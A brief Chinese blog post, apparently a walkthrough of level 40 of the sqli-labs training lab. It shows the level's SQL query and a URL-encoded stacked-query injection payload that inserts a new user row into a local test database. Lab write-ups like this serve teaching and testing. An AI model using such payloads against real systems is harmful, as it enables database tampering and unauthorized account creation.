Sqli-labs less 40

Less-40

本关的sql语句为SELECT * FROM users WHERE id=('$id') LIMIT 0,1

我们根据sql语句构造以下的payload:

http://127.0.0.1/sqli-labs/Less-40/index.php?id=1%27);%20insert%20into%20users(id,username,password)%20values%20(%27109%27,%27hello%27,%27hello%27)%23

posted @ 2016-08-11 21:57  lcamry  阅读(546)  评论(0编辑  收藏  举报